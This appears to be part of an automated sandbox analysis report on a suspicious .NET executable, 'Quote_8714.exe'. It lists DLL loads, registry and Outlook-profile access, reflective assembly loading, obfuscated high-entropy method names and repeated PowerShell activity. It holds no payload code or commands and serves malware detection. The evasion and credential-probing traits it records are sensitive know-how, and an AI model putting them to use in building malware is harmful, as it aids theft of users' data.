                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Quote_8714.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Quote_8714.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.Windows.Forms.pdb source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Windows.Forms.pdbt source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs.Net Code: SUY4jcYG9S System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs.Net Code: SUY4jcYG9S System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04FF8220 push eax; mov dword ptr [esp], ecx0_2_04FF8224
                        Source: Quote_8714.exeStatic PE information: section name: .text entropy: 7.6318451005062595
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WQ4pAJNjSwDBRX5WIy.csHigh entropy of concatenated method names: 'kDnXo7emXn', 'QN3X2pyyGW', 'a3AXHt9piL', 'n7HXUa0N1N', 'MXfXQ10sme', 'LGxXv2TBCy', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, HoMh05iiChQAZ1pRxMP.csHigh entropy of concatenated method names: 'F6YXNDvln8', 'PMwXzXdGio', 'EZ2Vdd823Z', 'qTyViUIkth', 'd5aVtg2qrc', 'IVdVWtGsZf', 'tEfV4lh7QC', 'L4qVAxFUI0', 'hksVCW4BKn', 'oeNVcKAUjb'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, pDSG7Z6RNajRWGUdxe.csHigh entropy of concatenated method names: 'ToString', 'BC9Pbb4rn9', 'UvpP3NQDfM', 'vF3P0GqWTA', 'yEOPxfb62J', 'nvnP7sMusM', 'OoSPLgkkgA', 'Pv5PrG6XcH', 'HSUPpVfEkh', 'yXuPu71KtJ'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, kx3wCBOTkFcMnULZwX.csHigh entropy of concatenated method names: 'ML8cmJ3KSF', 'Ld6cKS1HtB', 'ShHc6CoR8U', 'OIpcDjTQJF', 'CJOc1rn2r2', 'MmPcnmuKUs', 'iiicZ0pclf', 'BgQc58buXa', 'JtJcwlTm2Z', 'oIjcNTMixR'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, A36R4rupYcOJj6a5du.csHigh entropy of concatenated method names: 'anXUBxOhbO', 'ECeUqe0Q6A', 'uqUUjMSqP0', 'vDAUTVGTSC', 'PrPUYAeOXc', 'ATFUGLUFJ2', 'Dc2UEXIYrJ', 'XAeUOaiXxk', 'abFUIdTxT8', 'n8bU9CWTaO'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.csHigh entropy of concatenated method names: 'FHRWAORp1P', 'pWGWC0ljRl', 'RFLWcJkMJm', 'GMvWoFgd3a', 'LBbW27SjRn', 'zuiWHqfX2Y', 'Ns2WUe2hIK', 'LtDWvhtYyX', 'SoiW8cnHU7', 'b58WRiCdeO'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, VZLNlbmP18FsuuahNn.csHigh entropy of concatenated method names: 'd3CyMlELJX', 'PXLyhPX9hl', 'NE2ym55vwq', 'louyK6tbVF', 'P7My3tHryP', 'WVqy0vLR44', 'FP6yxhFrGZ', 'kXXy7vXOuv', 'OikyLmANyS', 'WXwyrEQm9y'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, uqB3aBLeH1TEZ34xgt.csHigh entropy of concatenated method names: 'f9eH6wE3RO', 'eXaHDMNNtR', 'j7fH1OcLSA', 'ToString', 'vVZHnaPkCS', 'ptGHZAIC8Y', 'J5E6Mr4kDRhdOxhilkt', 'Tiy4xY4sVBxWZVQpbFE'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, U0BU7mcV0JrjRojdkh.csHigh entropy of concatenated method names: 'Dispose', 'L4riw93WH0', 'uktt3C6s9R', 'HsygcI7XJC', 'EZciNh4UJB', 'hRsizKO7Sh', 'ProcessDialogKey', 'y3btdnGHLd', 'HPQtiXnpX8', 'SZott5Q4pA'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, HEIXbZJXBp1cma5btd.csHigh entropy of concatenated method names: 'bjolORhavP', 'mhalIPeeTX', 'CwUlkHuPtJ', 'Id5l34D3R3', 'tXwlxBuMjb', 'CO4l7gXAdT', 'M84lrelsWH', 'O8JlpaYKbh', 'b5WlMqqsQZ', 'aTRlbujQJJ'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, E6e5r1IdQk2jvvoEAf.csHigh entropy of concatenated method names: 'wGyoTPch51', 'zjcoGh3lNH', 'EtwoO5ktwr', 'FbqoITuKrV', 'zSkoykKsRQ', 'MXqoP6FpPC', 'yCCogssZD2', 'BoWoeUavlb', 'tWyoQSTBf0', 'pKboXGh9vU'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, hjRuKNDY9dXEHf7bmN.csHigh entropy of concatenated method names: 'bNKgRL0f7o', 'mtYgFdiVbM', 'ToString', 'jbrgCPWpjX', 'KeBgcQyKfH', 'v8VgoMqDib', 'l5rg2j1rN2', 'djkgHHOQLg', 'lcxgU6QVcY', 'GAfgv9IjJt'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, iEAVY4z9itSu7cK9t2.csHigh entropy of concatenated method names: 'AX3XGVgcVv', 'SFuXO3SpqJ', 'SOgXILHiq4', 'YyEXkyN7vk', 'EsqX3OtHot', 'mSkXxsdyIm', 'jSTX704vQe', 'DjuXSMlKWB', 'jbTXBCVxFk', 'h1kXqUgEoT'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WWcLOJi42BOoN1usNqQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vk9sQNUZpQ', 'xepsXJhJmb', 'w4ksVH7BEk', 'ETgssvROxG', 'AFSsao9mH0', 'gddsfAhFQo', 'XtxsS5ByLv'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, Mys8kS9iAUAbduMY6c.csHigh entropy of concatenated method names: 'iXC2YB9Sa3', 'l9n2Eemfsg', 'MR1o0UuQbt', 'jM6oxFjlKW', 'EMxo78pFII', 'qYvoL1cVQ7', 'XG8orCJxU1', 'Ugqop0EKTT', 'mARouB7ynP', 'gwToMubSGg'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, AOSBQjideAWeZ67TrVV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EPtXbjvo6a', 'OluXhq1hgI', 'nMcXJYLpG0', 'Qi7XmkPKE4', 'l45XKvaxVN', 'b9NX6EHlPg', 'JMIXDHwD2G'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, jSvwXyrAnkZcUZY49A.csHigh entropy of concatenated method names: 'uZQUCWHxpE', 'HERUoPuSeM', 'Er1UHuJNTG', 'RxnHN34Zjr', 'jGFHzJig69', 'YP4Ud0TKMq', 'z6WUiCX1lm', 'URTUtScG1O', 'KOqUWFSuPX', 'oAqU45lR1G'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, U65spvniGlUcp3jsf9.csHigh entropy of concatenated method names: 'nNTg5nYfkK', 'jeugNO7YrY', 'UhPedSG9rF', 'f45eiFYcvO', 'iFPgbT9xKJ', 'icWghamJg2', 't1lgJ1rjge', 'CYTgmLFAIk', 'Hx0gKlm3B9', 'GXeg6L9Sb5'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, wem6B4ttQEhOO9ZEQw.csHigh entropy of concatenated method names: 'mGsjdQ22X', 'hGTT3oDGy', 'v0hG69bPC', 'j07E0Mwoh', 'k4LIv9D3B', 'E8W9wmjRx', 'SxUmsPfFnTyqkoJIfK', 'dwuuxyYk57ygAkonv1', 'Ke4eepfso', 'EBxXvBxri'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, OnGHLdw3PQXnpX8KZo.csHigh entropy of concatenated method names: 'EqSQkLWPgO', 'vbLQ3P1fCi', 'FahQ0FAuKx', 'cXPQxmPK3w', 'SYEQ7bN1GI', 'pJHQLfFm54', 'RK9QrfyQX5', 'cQcQpWy6q8', 'qE2Qu1RVWo', 'ugOQMhNINT'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, jex2upZejp4r93WH0I.csHigh entropy of concatenated method names: 'oD1QyWDH0C', 'VEGQg9N4Yj', 'yWkQQN9cAP', 'TewQVBkag6', 'eN5QaIKeJv', 'cKeQSPsbVl', 'Dispose', 'pLbeCx8xr9', 'rrEecXBCKv', 'peteowU5X4'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, a88XZ145ajYnvP9QjT.csHigh entropy of concatenated method names: 'wpviUx3wCB', 'AkFivcMnUL', 'UdQiRk2jvv', 'hEAiFfpys8', 'MMYiy6cl1s', 'QsdiPA7RVY', 'yrHm0NgIq9dQdCcoOh', 'Thd2hYO6Hupm3QmMWo', 'LrKiiyG9h6', 'CE3iWTP9gd'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WcnHKDoLJ9tlCFXhZi.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PeHtwgsnkg', 'UCltNFB0Pj', 'bGUtzVbrRo', 'qhKWdnNF55', 'm0GWiOXNcC', 'VNeWt7xRyL', 'KJMWWS2DuU', 'b543b5olEctWdlIWlTB'
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, n1sJsdkA7RVYAfCH9l.csHigh entropy of concatenated method names: 'MwiHAORBUI', 'ExuHcjA4SE', 'aEjH2nsWHE', 'wetHUWyq4y', 'EC1HvbApGH', 'gMx21H9QqA', 'R4r2nDK1bR', 'SZS2ZoXahm', 'fF225Jf5yM', 'Ss02wTNbZn'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WQ4pAJNjSwDBRX5WIy.csHigh entropy of concatenated method names: 'kDnXo7emXn', 'QN3X2pyyGW', 'a3AXHt9piL', 'n7HXUa0N1N', 'MXfXQ10sme', 'LGxXv2TBCy', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, HoMh05iiChQAZ1pRxMP.csHigh entropy of concatenated method names: 'F6YXNDvln8', 'PMwXzXdGio', 'EZ2Vdd823Z', 'qTyViUIkth', 'd5aVtg2qrc', 'IVdVWtGsZf', 'tEfV4lh7QC', 'L4qVAxFUI0', 'hksVCW4BKn', 'oeNVcKAUjb'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, pDSG7Z6RNajRWGUdxe.csHigh entropy of concatenated method names: 'ToString', 'BC9Pbb4rn9', 'UvpP3NQDfM', 'vF3P0GqWTA', 'yEOPxfb62J', 'nvnP7sMusM', 'OoSPLgkkgA', 'Pv5PrG6XcH', 'HSUPpVfEkh', 'yXuPu71KtJ'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, kx3wCBOTkFcMnULZwX.csHigh entropy of concatenated method names: 'ML8cmJ3KSF', 'Ld6cKS1HtB', 'ShHc6CoR8U', 'OIpcDjTQJF', 'CJOc1rn2r2', 'MmPcnmuKUs', 'iiicZ0pclf', 'BgQc58buXa', 'JtJcwlTm2Z', 'oIjcNTMixR'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, A36R4rupYcOJj6a5du.csHigh entropy of concatenated method names: 'anXUBxOhbO', 'ECeUqe0Q6A', 'uqUUjMSqP0', 'vDAUTVGTSC', 'PrPUYAeOXc', 'ATFUGLUFJ2', 'Dc2UEXIYrJ', 'XAeUOaiXxk', 'abFUIdTxT8', 'n8bU9CWTaO'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.csHigh entropy of concatenated method names: 'FHRWAORp1P', 'pWGWC0ljRl', 'RFLWcJkMJm', 'GMvWoFgd3a', 'LBbW27SjRn', 'zuiWHqfX2Y', 'Ns2WUe2hIK', 'LtDWvhtYyX', 'SoiW8cnHU7', 'b58WRiCdeO'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, VZLNlbmP18FsuuahNn.csHigh entropy of concatenated method names: 'd3CyMlELJX', 'PXLyhPX9hl', 'NE2ym55vwq', 'louyK6tbVF', 'P7My3tHryP', 'WVqy0vLR44', 'FP6yxhFrGZ', 'kXXy7vXOuv', 'OikyLmANyS', 'WXwyrEQm9y'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, uqB3aBLeH1TEZ34xgt.csHigh entropy of concatenated method names: 'f9eH6wE3RO', 'eXaHDMNNtR', 'j7fH1OcLSA', 'ToString', 'vVZHnaPkCS', 'ptGHZAIC8Y', 'J5E6Mr4kDRhdOxhilkt', 'Tiy4xY4sVBxWZVQpbFE'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, U0BU7mcV0JrjRojdkh.csHigh entropy of concatenated method names: 'Dispose', 'L4riw93WH0', 'uktt3C6s9R', 'HsygcI7XJC', 'EZciNh4UJB', 'hRsizKO7Sh', 'ProcessDialogKey', 'y3btdnGHLd', 'HPQtiXnpX8', 'SZott5Q4pA'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, HEIXbZJXBp1cma5btd.csHigh entropy of concatenated method names: 'bjolORhavP', 'mhalIPeeTX', 'CwUlkHuPtJ', 'Id5l34D3R3', 'tXwlxBuMjb', 'CO4l7gXAdT', 'M84lrelsWH', 'O8JlpaYKbh', 'b5WlMqqsQZ', 'aTRlbujQJJ'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, E6e5r1IdQk2jvvoEAf.csHigh entropy of concatenated method names: 'wGyoTPch51', 'zjcoGh3lNH', 'EtwoO5ktwr', 'FbqoITuKrV', 'zSkoykKsRQ', 'MXqoP6FpPC', 'yCCogssZD2', 'BoWoeUavlb', 'tWyoQSTBf0', 'pKboXGh9vU'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, hjRuKNDY9dXEHf7bmN.csHigh entropy of concatenated method names: 'bNKgRL0f7o', 'mtYgFdiVbM', 'ToString', 'jbrgCPWpjX', 'KeBgcQyKfH', 'v8VgoMqDib', 'l5rg2j1rN2', 'djkgHHOQLg', 'lcxgU6QVcY', 'GAfgv9IjJt'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, iEAVY4z9itSu7cK9t2.csHigh entropy of concatenated method names: 'AX3XGVgcVv', 'SFuXO3SpqJ', 'SOgXILHiq4', 'YyEXkyN7vk', 'EsqX3OtHot', 'mSkXxsdyIm', 'jSTX704vQe', 'DjuXSMlKWB', 'jbTXBCVxFk', 'h1kXqUgEoT'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WWcLOJi42BOoN1usNqQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vk9sQNUZpQ', 'xepsXJhJmb', 'w4ksVH7BEk', 'ETgssvROxG', 'AFSsao9mH0', 'gddsfAhFQo', 'XtxsS5ByLv'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, Mys8kS9iAUAbduMY6c.csHigh entropy of concatenated method names: 'iXC2YB9Sa3', 'l9n2Eemfsg', 'MR1o0UuQbt', 'jM6oxFjlKW', 'EMxo78pFII', 'qYvoL1cVQ7', 'XG8orCJxU1', 'Ugqop0EKTT', 'mARouB7ynP', 'gwToMubSGg'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, AOSBQjideAWeZ67TrVV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EPtXbjvo6a', 'OluXhq1hgI', 'nMcXJYLpG0', 'Qi7XmkPKE4', 'l45XKvaxVN', 'b9NX6EHlPg', 'JMIXDHwD2G'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, jSvwXyrAnkZcUZY49A.csHigh entropy of concatenated method names: 'uZQUCWHxpE', 'HERUoPuSeM', 'Er1UHuJNTG', 'RxnHN34Zjr', 'jGFHzJig69', 'YP4Ud0TKMq', 'z6WUiCX1lm', 'URTUtScG1O', 'KOqUWFSuPX', 'oAqU45lR1G'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, U65spvniGlUcp3jsf9.csHigh entropy of concatenated method names: 'nNTg5nYfkK', 'jeugNO7YrY', 'UhPedSG9rF', 'f45eiFYcvO', 'iFPgbT9xKJ', 'icWghamJg2', 't1lgJ1rjge', 'CYTgmLFAIk', 'Hx0gKlm3B9', 'GXeg6L9Sb5'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, wem6B4ttQEhOO9ZEQw.csHigh entropy of concatenated method names: 'mGsjdQ22X', 'hGTT3oDGy', 'v0hG69bPC', 'j07E0Mwoh', 'k4LIv9D3B', 'E8W9wmjRx', 'SxUmsPfFnTyqkoJIfK', 'dwuuxyYk57ygAkonv1', 'Ke4eepfso', 'EBxXvBxri'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, OnGHLdw3PQXnpX8KZo.csHigh entropy of concatenated method names: 'EqSQkLWPgO', 'vbLQ3P1fCi', 'FahQ0FAuKx', 'cXPQxmPK3w', 'SYEQ7bN1GI', 'pJHQLfFm54', 'RK9QrfyQX5', 'cQcQpWy6q8', 'qE2Qu1RVWo', 'ugOQMhNINT'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, jex2upZejp4r93WH0I.csHigh entropy of concatenated method names: 'oD1QyWDH0C', 'VEGQg9N4Yj', 'yWkQQN9cAP', 'TewQVBkag6', 'eN5QaIKeJv', 'cKeQSPsbVl', 'Dispose', 'pLbeCx8xr9', 'rrEecXBCKv', 'peteowU5X4'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, a88XZ145ajYnvP9QjT.csHigh entropy of concatenated method names: 'wpviUx3wCB', 'AkFivcMnUL', 'UdQiRk2jvv', 'hEAiFfpys8', 'MMYiy6cl1s', 'QsdiPA7RVY', 'yrHm0NgIq9dQdCcoOh', 'Thd2hYO6Hupm3QmMWo', 'LrKiiyG9h6', 'CE3iWTP9gd'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WcnHKDoLJ9tlCFXhZi.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PeHtwgsnkg', 'UCltNFB0Pj', 'bGUtzVbrRo', 'qhKWdnNF55', 'm0GWiOXNcC', 'VNeWt7xRyL', 'KJMWWS2DuU', 'b543b5olEctWdlIWlTB'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, n1sJsdkA7RVYAfCH9l.csHigh entropy of concatenated method names: 'MwiHAORBUI', 'ExuHcjA4SE', 'aEjH2nsWHE', 'wetHUWyq4y', 'EC1HvbApGH', 'gMx21H9QqA', 'R4r2nDK1bR', 'SZS2ZoXahm', 'fF225Jf5yM', 'Ss02wTNbZn'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
